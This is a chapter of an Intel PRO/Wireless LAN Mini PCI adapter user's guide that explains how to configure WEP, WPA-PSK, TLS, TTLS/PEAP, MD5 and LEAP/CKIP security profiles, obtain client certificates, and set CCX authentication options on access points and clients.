Back to Contents

Setting up Connection Security: Intel(R) PRO/Wireless LAN Mini PCI Adapter User's Guide


Security and Encryption

Setting up Data Encryption and Authentication
Encryption Overview
How to Enable WEP Encryption
System Administrator Tasks
Setting up the Client for WEP and MD5 authentication
Setting up the Client for WPA-PSK with WEP or TKIP authentication
Setting up the Client for WPA using TKIP encryption and TLS authentication
Setting up the Client for WPA using TKIP encryption and TTLS or PEAP authentication
Setting up the Client for CCX using CKIP encryption and LEAP authentication


Setting up Data Encryption and Authentication

Wired Equivalent Privacy (WEP) encryption and shared authentication helps provide protection for your data on the network. WEP uses an encryption key to encrypt data before transmitting it. Only computers using the same encryption key can access the network or decrypt the encrypted data transmitted by other computers. Authentication provides an additional validation process from the adapter to the access point.  The WEP encryption algorithm is vulnerable to passive and active network attacks. TKIP and CKIP algorithms include enhancements to the WEP protocol that mitigate existing network attacks and address its shortcomings.

Open and Shared Key authentication

802.11 support two types of network authentication methods; Open System and Shared that use 64-bit and 128-bit WEP encryption. Open does not require an encryption authentication method to associate to a specific access point. Supported authentication schemes are Open and Shared authentication:

Network Keys

When Data Encryption (WEP, WEP, CKIP or TKIP) is enabled, a network key is used for encryption. A network key can be provided for you automatically (for example, it might be provided on your wireless network adapter, or you can enter it yourself and specify the key the key length (64-bits or 128-bit), key format (ASCII characters or hexadecimal digits), and key index (the location where a specific key is stored). The longer the key length, the more secure the key. Every time the length of a key is increased by one bit, the number of possible keys double.

Under 802.11, a wireless station can be configured with up to four keys (the key index values are 1, 2, 3, and 4). When an access point or a wireless station transmits an encrypted message using a key that is stored in a specific key index, the transmitted message indicates the key index that was used to encrypt the message body. The receiving access point or wireless station can then retrieve the key that is stored at the key index and use it to decode the encrypted message body.

Encryption Static and Dynamic Key Types

802.1x uses two types of encryption keys, static and dynamic. Static encryption keys are changed manually and are more vulnerable. MD5 authentication only uses static encryption keys. Dynamic encryption keys are renewed automatically on a periodic basis. This makes the encryption key(s) more secure. To enable dynamic encryption keys, you must use 802.1x authentication methods, such as TLS, TTLS, PEAP or LEAP.

802.1x Authentication key points

802.1x authentication methods include passwords certificates, and smartcards (plastic
cards that hold data). 802.1x password synchronization capability feature: The "Use Windows login" option on the MD5, TLS, TTLS, and LEAP Credentials dialog allows the 802.1x credentials to match your Windows user name and password. 802.1x authentication option can only be used with Infrastructure operation mode.


Encryption Overview

Security in the WLAN can be supplemented by enabling data encryption using WEP (Wireless Encryption Protocol). You can choose a 64 or 128 bit level encryption. Also, the data can then be encrypted with a key. Another parameter called the key index is provides the option to create multiple keys for that profile. However, only one key can be used at a time. You can also choose to password protect the profile to ensure privacy.

The pass phrase is used to generate a WEP key automatically. You have the option of either using a pass phrase or entering a WEP key manually. Using 64-bit encryption, the pass phrase is 5 characters long and you can choose to enter any arbitrary and easy to remember phrase like, Acme1, or enter 10 Hexadecimal characters for the WEP key that matches the network that the connects to. For 128-bit encryption, the pass phrase is 13 characters long or you can enter 26 hexadecimal characters for the WEP key to get connected to the appropriate network.

Note: You must use the same encryption type, key index number, and WEP key as other devices on your wireless network.


How to Enable WEP Encryption

The following example describes how to edit an existing profile and apply WEP encryption.

Note: Before you begin, contact your system administrator for the network WEP pass phrase or Hex Key.
 

To enable WEP encryption:

  1. From the General page, click the Networks tab.
  2. Select the profile from the Profile List and click the Edit button.
  3. Click the Security tab.
  4. Select any Network Authentication mode (Open is recommended).
  5. Select WEP Data Encryption.
  6. Select Set Manual Key.
  7. Select a key index number 1, 2, 3, or 4 (Default is 1)
  8. Select 64-bit or 128-bit Encryption Level.
  9. Select either of the following:
  1. Click OK to save the profiles settings.

System Administrator Tasks

Note: The following information is intended for system administrators. Refer to Administrator Privileges and Restricted Users for more information  

How to Obtain a Client Certificate

If you do not have any certificates for EAP-TLS, or EAP-TTLS you must get a client certificate to allow authentication. Typically you need to consult with your system network administrator for instructions on how to obtain a certificate on your network. Certificates can be managed from "Internet Settings", accessed from either Internet Explorer or the Windows Control Panel applet. Use the "Content" page of "Internet Settings".

Windows XP and 2000: When obtaining a client certificate, do not enable strong private key protection. If you enable strong private key protection for a certificate, you will need to enter an access password for the certificate each time this certificate is used. You must disable strong private key protection for the certificate if you are configuring the service for TLS/TTLS authentication. Otherwise the 802.1x service will fail authentication because there is no logged in user to whom it can display the prompt dialog.

Notes about Smart Cards

After installing a Smart Card, the certificate is automatically installed on your computer and can be select from the person certificate store and root certificate store.

Setting up the Client for TLS authentication

Step 1: Getting a certificate

To allow TLS authentication, you need a valid client (user) certificate in the local repository for the logged-in user’s account.  You also need a trusted CA certificate in the root store.

The following information provides two methods for getting a certificate;

Getting a certificate from a Windows 2000 CA:

  1. Start Internet Explorer and browse to the Certificate Authority HTTP Service (use a URL such as http://yourdomainserver.yourdomain/certsrv with certsrv being the command that brings you to the certificate authority. You can also use the IP address of the server machine, such as"192.0.2.12/certsrv."
  2. Logon to the CA with the name and password of the user account you created (above) on the authentication server. The name and password do not have to be the same as the Windows logon name and password of your current user.
  3. On the Welcome page of the CA select Request a certificate task and submit the form.
  4. On the Choose Request Type page, select Advanced request, then click Next.
  5. On the Advanced Certificate Requests page, select Submit a certificate request to this CA using a form, then click Submit.
  6. On the Advanced Certificate Request page choose the User certificate template. Select "Mark keys as exportable", and click Next. Use the provided defaults shown.
  7. On the Certificate Issued page select Install this certificate.

Note: If this is the first certificate you have obtained, the CA will first ask you if it should install a trusted CA certificate in the root store. The dialog will not say this is a trusted CA certificate, but the name on the certificate shown will be that of the host of the CA. Click yes, you need this certificate for both TLS and TTLS.

  1. If your certificate was successfully installed, you will see the message, "Your new certificate has been successfully installed."
  2. To verify the installation, click Internet Explorer > Tools > Internet Options > Content > Certificates. The new certificate should be installed in "Personal" folder.

Importing a certificate from a file

  1. Open Internet Properties (right-click on the Internet Explorer icon on the desktop and select Properties.
  2. Click the Certificates button on the Content page. This will open the list of installed certificates.
  3. Click the Import button under the list of certificates. This will start the Certificate Import Wizard. (Note: Steps 1 through 3 may also be accomplished by double-clicking the icon for the certificate.
  4. Select the file and proceed to the Password page.
  5. On the Password page specify your access password for the file. Clear the Enable strong private key protection option.
  6. On the Certificate store page select "Automatically select certificate store based on the type of certificate" (the certificate must be in the User accounts Personal store to be accessible in the Configure dialog of the Client; this will happen if ‘automatic’ is selected).
  7. Proceed to "Completing the Certificate Import" and click the Finish button.

To configure a profiles using WPA authentication with WEP or TKIP encryption using TLS authentication.

Step 2: Specifying the certificate used by Intel(R) PROSet

Note: Obtain and install a client certificate, refer to Step 1 or consult your system administrator.
  1. From the General page, click the Networks tab.
  2. Click the Add button.
  3. Enter the profile and network (SSID) name.
  4. Select Infrastructure for the operating mode.
  5. Click Next.
  6. Select WPA for the Network Authentication.
  7. Select WEP or TKIP as the Data Encryption.
  8. Click the 802.1x Enabled check box.
  9. Set the authentication type to TLS to be used with this connection.
  10. Click the Configure button to open the settings dialog.
  11. Enter your user name in the User Name field.
  12. Select the "Certificate Issuer" from the list. Select Any Trusted CA as the default.
  13. Enter the Server/Certificate name. If you know the server/certificate name enter this name. Select the appropriate option to match the server name exactly or specify the domain name.

  14. Client Certificate: This option selects a client certificate from the Personal certificate store of the Windows logged-in user. This certificate will be used for client authentication. Click the Select button to open a list of installed certificates.

Note about Certificates: The specified identity should match the field "Issued to" in the certificate and should be registered on the authentication server (i.e. RADIUS server) that is used by the authenticator. Your certificate must be "valid" with respect to the authentication server. This requirement depends on the authentication server and generally means that the authentication server must know the issuer of your certificate as a Certificate Authority. You should be logged in using the same username you used when the certificate was installed.

  1. Select the certificate from the list and click OK. The client certificate information displays under "Client Certificate".
  2. Click Close.
  3. Click Next.
  4. Click the Finish button to save profile settings.

Setting up the Client for WEP and MD5 authentication 

To add WEP and MD5 authentication to a new profile: 

Note: Before you begin, contact your system administrator for the username and password on the RADIUS server.

  1. From the General page, click the Networks tab.
  2. Click the Add button from the Profile List.
  3. Enter the profile and network (SSID) name.
  4. Select Infrastructure for the operating mode.
  5. Click Next.
  6. Select Open (recommended) Network Authentication.
  7. Select WEP Data Encryption.
  8. Select the key index 1, 2, 3 or 4. (Default key is 1)
  9. Select either 64 or 128-bit for the Encryption Level.
  10. Select either Use pass phrase or Use hex key and enter the Pass phrase or key in the text box.
  11. Click the 802.1x Enabled check box.
  12. Select MD5 as the 802.1x Authentication Type.
  13. Select one of the following options:
Note: If the 'Use Windows Logon' feature is grayed-out (not accessible), the Single Sign On feature has not been installed. To install the 'Use Windows Logon' feature refer to Installing or Uninstalling the Single Sign On Feature for installation instructions.
  1. Click Close to save the settings.
  2. Click Next.
  3. Common Profiles and Persistent Connect: If required, to enable the Common profile feature select This profile can be used by all users (Common). To enable the Persistent Connect feature select This profile will be used when no user is logged on (Persistent). These features are installed during the software installation process. If these features are select you must also enable Switch to common and persistent profile management in the Advanced Settings.
  4. Click Finish to save the profile settings.
  5. Select the new profile at the bottom of the Profiles List. Use the up and down arrows to position the priority of new profile in the priority list.
  6. Click Connect to connect to the selected wireless network.
  1. Click OK to close the Intel(R) PROSet.

Setting up the Client for WPA-PSK with WEP or TKIP authentication

Use Wi-Fi Protected Access Pre Shared Key (WPA-PSK) mode if there is no authentication server being used. This mode does not use any 802.1x authentication protocol. It can be used with WEP or TKIP data encryption. WPA-PSK requires configuration of a pre-shared key (PSK). A pass phrase or 64 hex characters for a Pre-Shared Key of length 256-bits must be entered. The data encryption key is derived from the PSK.

To configure a new profile using WEP or TKIP encryption with WPA-PSK network authentication:

  1. From the General page, click the Networks tab.
  2. Click the Add button.
  3. Enter the profile and network (SSID) name.
  4. Select Infrastructure for the operating mode.
  5. Click Next.
  6. Select WPA-PSK for the Network Authentication.
  7. Select WEP or TKIP as the Data Encryption.
  8. Select either of the following:
  9. Click Next.
  10. Click Finish to save the profile settings.
  11. Select the new profile at the bottom of the Profiles List. Use the up and down arrows to position the priority of new profile in the priority list.
  12. Click Connect to connect to the selected wireless network.
  13. Click OK to close the Intel(R) PROSet.

Setting up the Client for WPA using WEP or TKIP encryption and TLS authentication

Wi-Fi Protected Access (WPA) mode can be used with TLS, TTLS, or PEAP. This 802.1x authentication protocol uses data encryption options; WEP or TKIP. Wi-Fi Protected Access (WPA) mode binds with 802.1x authentication. The data encryption key is received from the 802.1x key exchange. To improve data encryption, Wi-Fi Protected Access utilizes its Temporal Key Integrity Protocol (TKIP). TKIP provides important data encryption enhancements including a re-keying method.

  1. Obtain and install a client certificate, refer to Setting up the Client for TLS authentication or consult your system administrator.
  2. From the General page, click the Networks tab.
  3. Click the Add button.
  4. Enter the profile and network (SSID) name.
  5. Select Infrastructure for the operating mode.
  6. Click Next.
  7. Select WPA Network Authentication.
  8. Select WEP or TKIP Data Encryption.
  9. Set the authentication type to TLS to be used with this connection.
  10. Click the Configure button to open the settings dialog.
  11. Enter your user name in the User Name field.

  12. Select the "Certificate Issuer" from the list. Select Any Trusted CA as the default.

  13. Click the "allow intermediate certificates" check box to allow a number of unspecified certificates to be in the server certificate chain between the server certificate and the specified CA. If unchecked, then the specified CA must have directly issued the server certificate.

  14. Enter the Server name. If you know the server name enter this name. Select the appropriate option to match the server name exactly or specify the domain name.

  15. Under the "Client certificate" option click the Select button.

Note about Certificates: The specified identity should match the field "Issued to" in the certificate and should be registered on the authentication server (i.e. RADIUS server) that is used by the authenticator. Your certificate must be "valid" with respect to the authentication server. This requirement depends on the authentication server and generally means that the authentication server must know the issuer of your certificate as a Certificate Authority. You should be logged in using the same username you used when the certificate was installed.

  1. Select the certificate from the list and click OK. The client certificate information displays under "Client Certificate".
  2. Click Close.
  3. Click Next.
  4. Click Finish to save the profile settings.
  5. Select the new profile at the bottom of the Profiles List. Use the up and down arrows to position the priority of new profile in the priority list.
  6. Click Connect to connect to the selected wireless network.
  7. Click OK to close the Intel(R) PROSet.

Setting up the Client for WPA using WEP or TKIP encryption and TTLS or PEAP authentication

TTLS authentication: These settings define the protocol and the credentials used to authenticate a user. In TTLS, the client uses EAP-TLS to validate the server and create a TLS-encrypted channel between the client and server. The client can use another authentication protocol, typically password-based protocols, such as MD5 Challenge over this encrypted channel to enable server validation. The challenge and response packets are sent over a non-exposed TLS encrypted channel.

PEAP authentication: PEAP settings are required for the authentication of the client to the authentication server. In PEAP, the client uses EAP-TLS to validate the server and create a TLS-encrypted channel between client and server. The client can use another EAP mechanism, such as Microsoft Challenge Authentication Protocol (MSCHAP) Version 2, over this encrypted channel to enable server validation. The challenge and response packets are sent over a non-exposed TLS encrypted channel.

The following example describes how to use WPA with WEP or TKIP encryption using TTLS or PEAP authentication.

  1. Obtain and install a client certificate, refer to Setting up the Client for TLS authentication or consult your system administrator.
  2. From the General page, click the Networks tab.
  3. Click the Add button.
  4. Enter the profile and network (SSID) name.
  5. Select Infrastructure for the operating mode.
  6. Click Next.
  7. Select WPA for the Network Authentication.
  8. Select WPA or TKIP as the Data Encryption.
  9. Select 802.1x Enabled.
  10. Set the authentication type to TTLS or PEAP to be used with this connection.
  11. Click the Configure button to open the settings dialog.
  12. Use credentials username as EAP identity: If the check box is cleared a predefined string “anonymous” will be sent as the authentication protocol. This feature uses a less secure authentication method which sends the real username unencrypted. This method is valid for all authentication servers, specifically for Microsoft IAS RADIUS that accepts only valid username.
  13. Select the Certificate Issuer from the list. Select Any Trusted CA as the default. Click the allow intermediate certificates check box to allow a number of unspecified certificates to be in the server certificate chain between the server certificate and the specified CA. If unchecked, then the specified CA must have directly issued the server certificate.
  14. Enter the Server name.

  1. Authentication Protocol:
  2. Select one of the following options:
Note: If the 'Use Windows Logon' feature is grayed-out (not accessible), the Single Sign On feature has not been installed. To install the 'Use Windows Logon' feature refer to Installing or Uninstalling the Single Sign On Feature for installation instructions.
  1. Use Client Certificate: This option selects a client certificate from the Personal certificate store of the Windows logged-in user. This certificate will be used for client authentication. Click the Select button to open a list of installed certificates.

Note about Certificates: The specified identity should match the field "Issued to" in the certificate and should be registered on the authentication server (i.e., RADIUS server) that is used by the authenticator. Your certificate must be "valid" with respect to the authentication server. This requirement depends on the authentication server and generally means that the authentication server must know the issuer of your certificate as a Certificate Authority. You should be logged in using the same username you used when the certificate was installed.

  1. Select the certificate from the list and click OK. The client certificate information displays under "Client Certificate".
  2. Click Close.
  3. Click Next.
  4. Select the new profile at the bottom of the Profiles List. Use the up and down arrows to position the priority of new profile in the priority list.
  5. Click Connect to connect to the selected wireless network.
  1. Click OK to close the Intel(R) PROSet.

Setting up the Client for CCX using CKIP encryption and LEAP authentication

Configuring LEAP using Intel(R) PROSet
Note: A LEAP profile can only be configured using Intel(R) PROSet.  

An Intel(R) PROSet CCX (v1.0) profile must be configured to connect to a specific ESS or Wireless LAN network. The profile settings include LEAP, CKIP and Rogue AP detection settings.

To configure a profile for CCX security settings:

  1. From the General page, click the Networks tab.
  2. Click the Add button.
  3. Enter the profile and network (SSID) name.
  4. Select Infrastructure for the operating mode.
  5. Click the Enable Cisco Compatible Extensions check box to enable CCX security. If you have checked the Cisco's "Mixed-Cell" box in the Advanced Setting, this option must also be checked. Note: The Network authentication and the Data Encryption now include the CCX security options: Open, Shared for 802.11 Authentication and none, WEP, CKIP for Data encryption.
  6. Click Next.
  7. Select Open in the Network Authentication options.
  8. Select CKIP as the Data encryption.
  9. Click the 802.1x Enabled check box to enable the 802.1x security option.
  10. Select LEAP 802.1x Authentication Type.
  11. Click Configure to open the LEAP Settings dialog.
  12. Select one of the following options:
Note: If the 'Use Windows Logon' feature is grayed-out (not accessible), the Single Sign On feature has not been installed. To install the 'Use Windows Logon' feature refer to Installing or Uninstalling the Single Sign On Feature for installation instructions.
  1. Click Close to save the settings and close the LEAP Settings dialog.
  2. Click NextThe Advanced page displays.
  3. Common Profiles and Persistent Connect: If required, to enable the Common profile feature select This profile can be used by all users (Common). To enable the Persistent Connect feature select This profile will be used when no user is logged on (Persistent). These features are installed during the software installation process. If these features are select you must also enable Switch to common and persistent profile management in the Advanced Settings.
  4. If you selected the Enable Cisco Compatible Extensions check box in the General Settings page to enable CCX security, ensure that the Cisco's "Enable Cisco Mixed Cell" check box is selected.
  5. Click Finish to save the profile settings.
  6. Select the new profile at the bottom of the Profiles List. Use the up and down arrows to position the priority of new profile in the priority list.
  7. Click Connect to connect to the selected wireless network.
  8. Enter your LEAP credentials. Check the Save User Credentials checkbox to save the credentials for future use with this 802.1x profile.
  9. Click OK to close the Intel(R) PROSet.

CCX Access Point and Client Configurations

The access point provides settings to select different authentication types depending on the WLAN environment. The client sends an Authentication algorithm field during the 802.11 authentication handshake that takes place between the client and the AP during connection establishment. The Authentication algorithm values recognized by a CCX enabled AP is different for the different authentication types. For instance "Network-EAP" which denotes LEAP has a value of 0x80 while "Open" which is the 802.11 specified Open authentication and "Required EAP" which requires an EAP handshake exchange have values of 0x0.

Network-EAP only

AP: For CCX enabled networks using LEAP authentication only the authentication type is set with "Network-EAP" check box selected, and "Open" and "Required EAP" boxes unchecked. The AP is then configured to allow LEAP clients ONLY to authenticate and connect. In this case, the AP expects the 802.11 authentication algorithm to be set to 0x80 (LEAP), and rejects clients that attempt authentication with an Authentication algorithm value 0x0.

Client: In this case the client needs to send out an authentication algorithm value of 0x80 else the 802.11 authentication handshake would fail. During boot, when the Wireless LAN driver is already loaded, but the Intel(R) PROSet supplicant is still unloaded, the client sends 802.11 authentication with an Authentication algorithm value of 0x0. Once the Intel(R) PROSet supplicant loads, and engages the LEAP profile, it sends 802.11 authentication with an Authentication algorithm value of 0x80.

Network-EAP, Open and Required EAP

AP: If Network-EAP, Open and Required EAP boxes are checked then it would accept both types of 802.11 authentication algorithm values 0x0 and 0x80. However, once the client is associated and authenticated the AP expects an EAP handshake to take place. For any reason if the EAP handshake does not take place quickly, the AP would not respond to the client for about 60 seconds.

Client: Here the client could send out an authentication algorithm value of 0x80 or 0x0. Both values are acceptable and the 802.11 authentication handshake would succeed. During boot, when the Wireless LAN driver is already loaded and the client sends 802.11 authentication with an Authentication algorithm value of 0x0. This is sufficient to get authenticated but the corresponding EAP or LEAP credentials need to be communicated to the AP to establish a connection.

Open and Required EAP only

AP: In the case where the AP is configured with Network-EAP unchecked, but Open and Required EAP checked, the AP will reject any client attempting to 802.11 authenticate using an authentication algorithm value of 0x80. The AP would accept any client using an authentication algorithm value of 0x0, and expects EAP handshake to commence soon after. In this case, the client uses MD5, TLS, LEAP or any other appropriate EAP method suitable for the specific network configuration.

Client: The client in this case is required to send out an authentication algorithm value of 0x0. As mentioned before the sequence involves a repeat of the initial 802.11 authentication handshake. First, the Wireless LAN driver initiates authentication with a value of 0x0 and later the supplicant would repeat the process. The client sends an 802.11 authentication with Authentication algorithm value of 0x0 even after the supplicant loads and engages the LEAP profile.

Rogue AP

A LEAP profile ensures that the client implements the Rogue AP feature as required by CCX. The client makes note of access points that it failed to authenticate with and sends this information to the AP that allows it to authenticate and connect. Also, the supplicant sets the Authentication algorithm type to 0x80. There may be some network configurations implementing and Open and Required EAP only as described above. For this setup to work, the client must use an Authentication Algorithm value of 0x0, as opposed to the need to use 0x80 for Network-EAP only described above. A LEAP profile enables the client to support Network-EAP only and Open and Required EAP only.

Note: Please refer to Cisco Client extensions version 2.0 document available at www.cisco.com for more details.


Back to Contents